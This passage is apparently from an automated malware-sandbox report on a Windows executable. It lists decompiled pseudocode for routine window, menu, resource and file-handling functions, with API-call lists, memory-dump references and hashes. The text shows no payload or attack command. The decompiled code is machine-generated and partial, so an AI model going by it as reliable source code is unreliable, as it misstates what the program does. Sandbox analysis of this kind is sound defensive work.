                                  0x0040b6ea
                                  0x0040b6f0
                                  0x0040b6fd
                                  0x0040b703
                                  0x0040b70d
                                  0x0040b713
                                  0x0040b71a
                                  0x0040b720
                                  0x0040b727
                                  0x0040b72d
                                  0x0040b749
                                  0x0040b75c

                                  APIs
                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040B5FD
                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040B621
                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040B63C
                                  • LoadStringA.USER32 ref: 0040B6D2
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                  • String ID:
                                  • API String ID: 3990497365-0
                                  • Opcode ID: 325eb99e9d33ff581ee36609930eb5d9b5ff5929fbe289664a34b1e0916027b9
                                  • Instruction ID: a3a51aa19031e33d32acf0a3f0e696e99f7b117d10c439a904412c0467a576b0
                                  • Opcode Fuzzy Hash: 325eb99e9d33ff581ee36609930eb5d9b5ff5929fbe289664a34b1e0916027b9
                                  • Instruction Fuzzy Hash: 58415070A002589BDB21EB69CD81B9AB7FC9B18304F4040FAA548F7392D7799F848F59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00421C30, Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 64%
                                  			E00421C30(intOrPtr __eax, void* __edx) {
				intOrPtr _v8;
				void* __ebx;
				void* __ecx;
				void* __esi;
				void* __ebp;
				intOrPtr _t33;
				struct HDC__* _t47;
				intOrPtr _t54;
				intOrPtr _t58;
				struct HDC__* _t66;
				void* _t67;
				intOrPtr _t76;
				void* _t81;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr _t86;

				_t84 = _t86;
				_push(_t67);
				_v8 = __eax;
				_t33 = _v8;
				if( *((intOrPtr*)(_t33 + 0x58)) == 0) {
					return _t33;
				} else {
					E0041E554(_v8);
					_push(_t84);
					_push(0x421d0f);
					_push( *[fs:eax]);
					 *[fs:eax] = _t86;
					E00423044( *((intOrPtr*)(_v8 + 0x58)));
					E00421AAC( *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8));
					_t47 = E00423228( *((intOrPtr*)(_v8 + 0x58)));
					_push(0);
					L00406374();
					_t66 = _t47;
					_t81 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8);
					if(_t81 == 0) {
						 *((intOrPtr*)(_v8 + 0x5c)) = 0;
					} else {
						 *((intOrPtr*)(_v8 + 0x5c)) = SelectObject(_t66, _t81);
					}
					_t54 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28));
					_t82 =  *((intOrPtr*)(_t54 + 0x10));
					if(_t82 == 0) {
						 *((intOrPtr*)(_v8 + 0x60)) = 0;
					} else {
						_push(0xffffffff);
						_push(_t82);
						_push(_t66);
						L004064E4();
						 *((intOrPtr*)(_v8 + 0x60)) = _t54;
						_push(_t66);
						L004064B4();
					}
					E0041E958(_v8, _t66);
					_t58 =  *0x46e6e0; // 0x20f0b60
					E00414014(_t58, _t66, _t67, _v8, _t82);
					_pop(_t76);
					 *[fs:eax] = _t76;
					_push(0x421d16);
					return E0041E7C4(_v8);
				}
			}



















                                  0x00421c31
                                  0x00421c33
                                  0x00421c36
                                  0x00421c39
                                  0x00421c40
                                  0x00421d1a
                                  0x00421c46
                                  0x00421c49
                                  0x00421c50
                                  0x00421c51
                                  0x00421c56
                                  0x00421c59
                                  0x00421c62
                                  0x00421c73
                                  0x00421c7e
                                  0x00421c83
                                  0x00421c85
                                  0x00421c8a
                                  0x00421c95
                                  0x00421c9a
                                  0x00421cb0
                                  0x00421c9c
                                  0x00421ca6
                                  0x00421ca6
                                  0x00421cb9
                                  0x00421cbc
                                  0x00421cc1
                                  0x00421cdf
                                  0x00421cc3
                                  0x00421cc3
                                  0x00421cc5
                                  0x00421cc6
                                  0x00421cc7
                                  0x00421ccf
                                  0x00421cd2
                                  0x00421cd3
                                  0x00421cd3
                                  0x00421ce7
                                  0x00421cef
                                  0x00421cf4
                                  0x00421cfb
                                  0x00421cfe
                                  0x00421d01
                                  0x00421d0e
                                  0x00421d0e

                                  APIs
                                    • Part of subcall function 0041E554: RtlEnterCriticalSection.KERNEL32(004708CC,00000000,0041CCC2,00000000,0041CD21), ref: 0041E55C
                                    • Part of subcall function 0041E554: RtlLeaveCriticalSection.KERNEL32(004708CC,004708CC,00000000,0041CCC2,00000000,0041CD21), ref: 0041E569
                                    • Part of subcall function 0041E554: RtlEnterCriticalSection.KERNEL32(00000038,004708CC,004708CC,00000000,0041CCC2,00000000,0041CD21), ref: 0041E572
                                    • Part of subcall function 00423228: 72E7AC50.USER32(00000000,?,?,?,?,00421C83,00000000,00421D0F), ref: 0042327E
                                    • Part of subcall function 00423228: 72E7AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00421C83,00000000,00421D0F), ref: 00423293
                                    • Part of subcall function 00423228: 72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00421C83,00000000,00421D0F), ref: 0042329D
                                    • Part of subcall function 00423228: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00421C83,00000000,00421D0F), ref: 004232C1
                                    • Part of subcall function 00423228: 72E7B380.USER32(00000000,00000000,00000000,?,?,?,?,00421C83,00000000,00421D0F), ref: 004232CC
                                  • 72E7A590.GDI32(00000000,00000000,00421D0F), ref: 00421C85
                                  • SelectObject.GDI32(00000000,?), ref: 00421C9E
                                  • 72E7B410.GDI32(00000000,?,000000FF,00000000,00000000,00421D0F), ref: 00421CC7
                                  • 72E7B150.GDI32(00000000,00000000,?,000000FF,00000000,00000000,00421D0F), ref: 00421CD3
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CriticalSection$Enter$A590B150B380B410CreateHalftoneLeaveObjectPaletteSelect
                                  • String ID:
                                  • API String ID: 2198039625-0
                                  • Opcode ID: 797b201a8bf25ea2984713e6fdc8649c359e8b1494f4439d42eb416b83b2d59b
                                  • Instruction ID: 8339b486aee61e2cd3e6be662231ec73c450f738bb8f9089c8d6b71666ce1e56
                                  • Opcode Fuzzy Hash: 797b201a8bf25ea2984713e6fdc8649c359e8b1494f4439d42eb416b83b2d59b
                                  • Instruction Fuzzy Hash: 10310438B00618EFD704EF5ADA81D4DB7F5FF48714B6241A6A804AB372D638EE40DB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00449584, Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00449584(void* __eax, struct HMENU__* __edx, int _a4, int _a8, CHAR* _a12) {
				intOrPtr _v8;
				void* __ecx;
				void* __edi;
				int _t27;
				void* _t40;
				int _t41;
				int _t50;

				_t50 = _t41;
				_t49 = __edx;
				_t40 = __eax;
				if(E00448A40(__eax) == 0) {
					return GetMenuStringA(__edx, _t50, _a12, _a8, _a4);
				}
				_v8 = 0;
				if((GetMenuState(__edx, _t50, _a4) & 0x00000010) == 0) {
					_t27 = GetMenuItemID(_t49, _t50);
					_t51 = _t27;
					if(_t27 != 0xffffffff) {
						_v8 = E004488BC(_t40, 0, _t51);
					}
				} else {
					_t49 = GetSubMenu(_t49, _t50);
					_v8 = E004488BC(_t40, 1, _t37);
				}
				if(_v8 == 0) {
					return 0;
				} else {
					 *_a12 = 0;
					E00408994(_a12, _a8,  *((intOrPtr*)(_v8 + 0x30)));
					return E004088D8(_a12, _t49);
				}
			}










                                  0x0044958b
                                  0x0044958d
                                  0x0044958f
                                  0x0044959a
                                  0x00000000
                                  0x0044961e
                                  0x0044959e
                                  0x004495ae
                                  0x004495cb
                                  0x004495d0
                                  0x004495d5
                                  0x004495e2
                                  0x004495e2
                                  0x004495b0
                                  0x004495b7
                                  0x004495c4
                                  0x004495c4
                                  0x004495e9
                                  0x00000000
                                  0x004495eb
                                  0x004495ee
                                  0x004495fd
                                  0x00000000
                                  0x00449605

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Menu$ItemStateString
                                  • String ID:
                                  • API String ID: 306270399-0
                                  • Opcode ID: 3e43f196225cfaa6c131155aea87cff4b6dfc03ce8244ecf0db90ca7bf47f49b
                                  • Instruction ID: 730118f3934a0f3e4bb88c58c95d6a057a4e8e8de3e8db02ad0b9ecb596fca21
                                  • Opcode Fuzzy Hash: 3e43f196225cfaa6c131155aea87cff4b6dfc03ce8244ecf0db90ca7bf47f49b
                                  • Instruction Fuzzy Hash: 5B117F31601214AFEB01EF2D8C81AAF77E89F49354B11446FF819D7381DA789D01A7A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0045503C, Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0045503C(void* __eax, void* __ecx, char __edx) {
				char _v12;
				struct HWND__* _v20;
				int _t17;
				void* _t27;
				struct HWND__* _t33;
				void* _t35;
				void* _t36;
				long _t37;

				_t37 = _t36 + 0xfffffff8;
				_t27 = __eax;
				_t17 =  *0x470b40; // 0x0
				if( *((intOrPtr*)(_t17 + 0x30)) != 0) {
					if( *((intOrPtr*)(__eax + 0x94)) == 0) {
						 *_t37 =  *((intOrPtr*)(__eax + 0x30));
						_v12 = __edx;
						EnumWindows(E00454FCC, _t37);
						_t5 = _t27 + 0x90; // 0x0
						_t17 =  *_t5;
						if( *((intOrPtr*)(_t17 + 8)) != 0) {
							_t33 = GetWindow(_v20, 3);
							_v20 = _t33;
							if((GetWindowLongA(_t33, 0xffffffec) & 0x00000008) != 0) {
								_v20 = 0xfffffffe;
							}
							_t10 = _t27 + 0x90; // 0x0
							_t17 =  *_t10;
							_t35 =  *((intOrPtr*)(_t17 + 8)) - 1;
							if(_t35 >= 0) {
								do {
									_t13 = _t27 + 0x90; // 0x0
									_t17 = SetWindowPos(E00413D2C( *_t13, _t35), _v20, 0, 0, 0, 0, 0x213);
									_t35 = _t35 - 1;
								} while (_t35 != 0xffffffff);
							}
						}
					}
					 *((intOrPtr*)(_t27 + 0x94)) =  *((intOrPtr*)(_t27 + 0x94)) + 1;
				}
				return _t17;
			}











                                  0x0045503e
                                  0x00455041
                                  0x00455043
                                  0x0045504c
                                  0x00455059
                                  0x00455062
                                  0x00455065
                                  0x00455071
                                  0x00455076
                                  0x00455076
                                  0x00455080
                                  0x0045508e
                                  0x00455090
                                  0x0045509d
                                  0x0045509f
                                  0x0045509f
                                  0x004550a6
                                  0x004550a6
                                  0x004550af
                                  0x004550b3
                                  0x004550b5
                                  0x004550c9
                                  0x004550d5
                                  0x004550da
                                  0x004550db
                                  0x004550b5
                                  0x004550b3
                                  0x00455080
                                  0x004550e0
                                  0x004550e0
                                  0x004550ea

                                  APIs
                                  • EnumWindows.USER32(00454FCC), ref: 00455071
                                  • GetWindow.USER32(00000003,00000003), ref: 00455089
                                  • GetWindowLongA.USER32 ref: 00455096
                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 004550D5
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Window$EnumLongWindows
                                  • String ID:
                                  • API String ID: 4191631535-0
                                  • Opcode ID: 5ec3313145a86c5b264056860e955fc533dec79990326a6888869e60c134bdcb
                                  • Instruction ID: 6e5778e9fa521275c17b7e9b5e8af9e38faca03e042dff6edf411df892f4f507
                                  • Opcode Fuzzy Hash: 5ec3313145a86c5b264056860e955fc533dec79990326a6888869e60c134bdcb
                                  • Instruction Fuzzy Hash: DF115E316046109FDB10EB28C895FA673E4AB44729F15427AFD58AB2D3C378AC44C799
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004164E0, Relevance: 6.1, APIs: 4, Instructions: 51COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 80%
                                  			E004164E0(void* __eax, struct HINSTANCE__* __edx, CHAR* _a8) {
				CHAR* _v8;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t18;
				void* _t23;
				CHAR* _t24;
				void* _t25;
				struct HRSRC__* _t29;
				void* _t30;
				struct HINSTANCE__* _t31;
				void* _t32;

				_v8 = _t24;
				_t31 = __edx;
				_t23 = __eax;
				_t29 = FindResourceA(__edx, _v8, _a8);
				 *(_t23 + 0x10) = _t29;
				if(_t29 == 0) {
					E00416440(_t23, _t24, _t29, _t31, _t32);
					_pop(_t24);
				}
				_t5 = _t23 + 0x10; // 0x41657c
				_t30 = LoadResource(_t31,  *_t5);
				 *(_t23 + 0x14) = _t30;
				if(_t30 == 0) {
					E00416440(_t23, _t24, _t30, _t31, _t32);
				}
				_t7 = _t23 + 0x10; // 0x41657c
				_push(SizeofResource(_t31,  *_t7));
				_t8 = _t23 + 0x14; // 0x416218
				_t18 = LockResource( *_t8);
				_pop(_t25);
				return E004161D8(_t23, _t25, _t18);
			}

















                                  0x004164e7
                                  0x004164ea
                                  0x004164ec
                                  0x004164fc
                                  0x004164fe
                                  0x00416503
                                  0x00416506
                                  0x0041650b
                                  0x0041650b
                                  0x0041650c
                                  0x00416516
                                  0x00416518
                                  0x0041651d
                                  0x00416520
                                  0x00416525
                                  0x00416526
                                  0x00416530
                                  0x00416531
                                  0x00416535
                                  0x0041653e
                                  0x00416549

                                  APIs
                                  • FindResourceA.KERNEL32(?,?,?), ref: 004164F7
                                  • LoadResource.KERNEL32(?,0041657C,?,?,?,0041218C,?,00000001,00000000,?,00416422,00000000,?), ref: 00416511
                                  • SizeofResource.KERNEL32(?,0041657C,?,0041657C,?,?,?,0041218C,?,00000001,00000000,?,00416422,00000000,?), ref: 0041652B
                                  • LockResource.KERNEL32(00416218,00000000,?,0041657C,?,0041657C,?,?,?,0041218C,?,00000001,00000000,?,00416422,00000000), ref: 00416535
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Resource$FindLoadLockSizeof
                                  • String ID:
                                  • API String ID: 3473537107-0
                                  • Opcode ID: effc771eec9c3359a5299f979711bfb0c583d7d57c5b227f1da7ba67130cfa55
                                  • Instruction ID: bd0c09abf3e03c4d42031b172baf39923f9370058f279f6758b079423682a0b4
                                  • Opcode Fuzzy Hash: effc771eec9c3359a5299f979711bfb0c583d7d57c5b227f1da7ba67130cfa55
                                  • Instruction Fuzzy Hash: 1AF04B726002046F9744EF9AA881D9B77ECEE88368312006EFD08D7206DA39DD118779
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00408598, Relevance: 6.0, APIs: 4, Instructions: 43timefileCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00408598(WORD* __eax) {
				struct _FILETIME _v16;
				WORD* _t31;
				long _t36;
				void* _t37;
				struct _FILETIME* _t38;

				_t38 = _t37 + 0xfffffff8;
				_t31 = __eax;
				while((_t31[0xc].dwFileAttributes & _t31[8]) != 0) {
					if(FindNextFileA(_t31[0xa],  &(_t31[0xc])) != 0) {
						continue;
					} else {
						_t36 = GetLastError();
					}
					L5:
					return _t36;
				}
				FileTimeToLocalFileTime( &(_t31[0x16]), _t38);
				FileTimeToDosDateTime( &_v16,  &(_t31[1]), _t31);
				_t31[2] = _t31[0x1c];
				_t31[4] = _t31[0xc].dwFileAttributes;
				E0040438C( &(_t31[6]), 0x104,  &(_t31[0x22]));
				_t36 = 0;
				goto L5;
			}








                                  0x0040859a
                                  0x0040859d
                                  0x004085bb
                                  0x004085b0
                                  0x00000000
                                  0x004085b2
                                  0x004085b7
                                  0x004085b7
                                  0x004085fa
                                  0x00408600
                                  0x00408600
                                  0x004085c8
                                  0x004085d7
                                  0x004085df
                                  0x004085e5
                                  0x004085f3
                                  0x004085f8
                                  0x00000000

                                  APIs
                                  • FindNextFileA.KERNEL32(?,?), ref: 004085A9
                                  • GetLastError.KERNEL32(?,?), ref: 004085B2
                                  • FileTimeToLocalFileTime.KERNEL32(?), ref: 004085C8
                                  • FileTimeToDosDateTime.KERNEL32 ref: 004085D7
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: FileTime$DateErrorFindLastLocalNext
                                  • String ID:
                                  • API String ID: 2103556486-0
                                  • Opcode ID: e3039e5cb61183d64ee860cb5a8373964d7b685bcf0ba32209ffd6352513d08c
                                  • Instruction ID: 3e63325add3c55498705f99be63b8988188adc079c016c58041bd934e135173b
                                  • Opcode Fuzzy Hash: e3039e5cb61183d64ee860cb5a8373964d7b685bcf0ba32209ffd6352513d08c
                                  • Instruction Fuzzy Hash: 0C01FFB6600210AFCB04DFA8C9C188773ECAB4836471545BBFD46DF28BE638D95487B9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004327E8, Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 87%
                                  			E004327E8(struct HWND__* __eax, void* __ecx) {
				intOrPtr _t9;
				signed int _t16;
				struct HWND__* _t19;
				DWORD* _t20;

				_t17 = __ecx;
				_push(__ecx);
				_t19 = __eax;
				_t16 = 0;
				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t20) != 0 && GetCurrentProcessId() ==  *_t20) {
					_t9 =  *0x470ab0; // 0x0
					if(GlobalFindAtomA(E004045DC(_t9)) !=  *0x470aac) {
						_t16 = 0 | E00431870(_t19, _t17) != 0x00000000;
					} else {
						_t16 = 0 | GetPropA(_t19,  *0x470aac & 0x0000ffff) != 0x00000000;
					}
				}
				return _t16;
			}







                                  0x004327e8
                                  0x004327ea
                                  0x004327eb
                                  0x004327ed
                                  0x004327f1
                                  0x00432808
                                  0x0043281f
                                  0x0043283f
                                  0x00432821
                                  0x00432831
                                  0x00432831
                                  0x0043281f
                                  0x00432847

                                  APIs
                                  • GetWindowThreadProcessId.USER32(00000000), ref: 004327F5
                                  • GetCurrentProcessId.KERNEL32(00000000,?,?,-00000010,00000000,00432860,00432628,52FF108B,00000000,0043241A,?,-00000010,?), ref: 004327FE
                                  • GlobalFindAtomA.KERNEL32 ref: 00432813
                                  • GetPropA.USER32 ref: 0043282A
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                  • String ID:
                                  • API String ID: 2582817389-0
                                  • Opcode ID: ce64668a4fe9bf5b9cab420989a359330f643eb952969cda96e326aff2303cd0
                                  • Instruction ID: d4baa464cd4f2ed18d37aed5e126c9cfef399abef2086ccac46b60058e8cb31d
                                  • Opcode Fuzzy Hash: ce64668a4fe9bf5b9cab420989a359330f643eb952969cda96e326aff2303cd0
                                  • Instruction Fuzzy Hash: 36F0207260AA226BD62177764E4186F21CC9E24318F10813BFC40D22A6DB2CCC9281BE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004318A4, Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 87%
                                  			E004318A4(struct HWND__* __eax, void* __ecx) {
				intOrPtr _t5;
				struct HWND__* _t12;
				void* _t15;
				DWORD* _t16;

				_t13 = __ecx;
				_push(__ecx);
				_t12 = __eax;
				_t15 = 0;
				if(__eax != 0 && GetWindowThreadProcessId(__eax, _t16) != 0 && GetCurrentProcessId() ==  *_t16) {
					_t5 =  *0x470ab4; // 0x0
					if(GlobalFindAtomA(E004045DC(_t5)) !=  *0x470aae) {
						_t15 = E00431870(_t12, _t13);
					} else {
						_t15 = GetPropA(_t12,  *0x470aae & 0x0000ffff);
					}
				}
				return _t15;
			}







                                  0x004318a4
                                  0x004318a6
                                  0x004318a7
                                  0x004318a9
                                  0x004318ad
                                  0x004318c4
                                  0x004318db
                                  0x004318f6
                                  0x004318dd
                                  0x004318eb
                                  0x004318eb
                                  0x004318db
                                  0x004318fd

                                  APIs
                                  • GetWindowThreadProcessId.USER32(00000000), ref: 004318B1
                                  • GetCurrentProcessId.KERNEL32(?,0046D588,00000000,00457BE5,?,?,0046D588,00000001,004561E4,?,00000000,00000000,00000000,00000001), ref: 004318BA
                                  • GlobalFindAtomA.KERNEL32 ref: 004318CF
                                  • GetPropA.USER32 ref: 004318E6
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: Process$AtomCurrentFindGlobalPropThreadWindow
                                  • String ID:
                                  • API String ID: 2582817389-0
                                  • Opcode ID: 67064ea43f90be55d9888ad63b4c50a935d3a828f17850ecb6032a26817ddd44
                                  • Instruction ID: 16a02b4edb54ed26c6b7321964109a7b4619efb432fc04768045c23baaff89f4
                                  • Opcode Fuzzy Hash: 67064ea43f90be55d9888ad63b4c50a935d3a828f17850ecb6032a26817ddd44
                                  • Instruction Fuzzy Hash: C2F06CA170531156D724B7BA6C8182B16CCD91A3E9B01183BB945E71A2D53CCC91837D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0045482C, Relevance: 6.0, APIs: 4, Instructions: 34threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0045482C(void* __ecx) {
				void* _t2;
				DWORD* _t7;

				_t2 =  *0x470b40; // 0x0
				if( *((char*)(_t2 + 0xad)) == 0) {
					if( *0x470b58 == 0) {
						_t2 = SetWindowsHookExA(3, E004547E8, 0, GetCurrentThreadId());
						 *0x470b58 = _t2;
					}
					if( *0x470b54 == 0) {
						_t2 = CreateEventA(0, 0, 0, 0);
						 *0x470b54 = _t2;
					}
					if( *0x470b5c == 0) {
						_t2 = CreateThread(0, 0x3e8, E0045478C, 0, 0, _t7);
						 *0x470b5c = _t2;
					}
				}
				return _t2;
			}





                                  0x0045482d
                                  0x00454839
                                  0x00454842
                                  0x00454854
                                  0x00454859
                                  0x00454859
                                  0x00454865
                                  0x0045486f
                                  0x00454874
                                  0x00454874
                                  0x00454880
                                  0x00454893
                                  0x00454898
                                  0x00454898
                                  0x00454880
                                  0x0045489e

                                  APIs
                                  • GetCurrentThreadId.KERNEL32 ref: 00454844
                                  • SetWindowsHookExA.USER32 ref: 00454854
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,0045785A), ref: 0045486F
                                  • CreateThread.KERNEL32(00000000,000003E8,0045478C,00000000,00000000), ref: 00454893
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: CreateThread$CurrentEventHookWindows
                                  • String ID:
                                  • API String ID: 1195359707-0
                                  • Opcode ID: 8cf5178579fc43657cbec4a271b8a2ac04aedb8654193e9b74272b57baf4d48c
                                  • Instruction ID: 23923bf5454ec496cc62a370bf888c93aba378d183ff87e74dc9f3d84d0597b6
                                  • Opcode Fuzzy Hash: 8cf5178579fc43657cbec4a271b8a2ac04aedb8654193e9b74272b57baf4d48c
                                  • Instruction Fuzzy Hash: BEF03074682380BEF71067A19C06F2636949351B1EF11007BF5097F1D2C3B965C88A5D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00459324, Relevance: 6.0, APIs: 4, Instructions: 24COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 48%
                                  			E00459324(signed int __eax) {
				signed int _t1;
				signed int _t2;

				_t1 = __eax;
				_push(0);
				L004066E4();
				_t2 = __eax;
				_push(0xc);
				_push(__eax);
				L0040641C();
				_push(0xe);
				_push(__eax);
				L0040641C();
				if(__eax * __eax > 8) {
					 *0x46f05f = 0;
				} else {
					 *0x46f05f = 1;
				}
				_push(_t2);
				_push(0);
				L00406944();
				return _t1;
			}





                                  0x00459324
                                  0x00459326
                                  0x00459328
                                  0x0045932d
                                  0x0045932f
                                  0x00459331
                                  0x00459332
                                  0x00459339
                                  0x0045933b
                                  0x0045933c
                                  0x00459347
                                  0x00459352
                                  0x00459349
                                  0x00459349
                                  0x00459349
                                  0x00459359
                                  0x0045935a
                                  0x0045935c
                                  0x00459363

                                  APIs
                                  • 72E7AC50.USER32(00000000,?,?,0046B09B,00000000,0046B100,?,00000000,00000000), ref: 00459328
                                  • 72E7AD70.GDI32(00000000,0000000C,00000000,?,?,0046B09B,00000000,0046B100,?,00000000,00000000), ref: 00459332
                                  • 72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,0046B09B,00000000,0046B100,?,00000000,00000000), ref: 0045933C
                                  • 72E7B380.USER32(00000000,00000000,00000000,0000000E,00000000,0000000C,00000000,?,?,0046B09B,00000000,0046B100,?,00000000,00000000), ref: 0045935C
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.660577222.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000006.00000002.660571716.0000000000400000.00000002.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660630411.000000000046E000.00000004.00020000.sdmp Download File
                                  • Associated: 00000006.00000002.660638852.0000000000476000.00000002.00020000.sdmp Download File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_400000_CLWCP.jbxd
                                  Similarity
                                  • API ID: B380
                                  • String ID:
                                  • API String ID: 120756276-0
                                  • Opcode ID: e50913134c09b3162230df70f966bd8cdfb9f6e0f9086267f4a712ba9af7f4ef
                                  • Instruction ID: 6e2f045cb5ca97dadcbe135a89dac665ada7a80bb880bc728cb1a6d01e7b84f3
                                  • Opcode Fuzzy Hash: e50913134c09b3162230df70f966bd8cdfb9f6e0f9086267f4a712ba9af7f4ef
                                  • Instruction Fuzzy Hash: 9AE012916442E4E8F26033766DC7F6A0A8C8B0575AF0A0477FE467E1C3D4ED4C68467E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

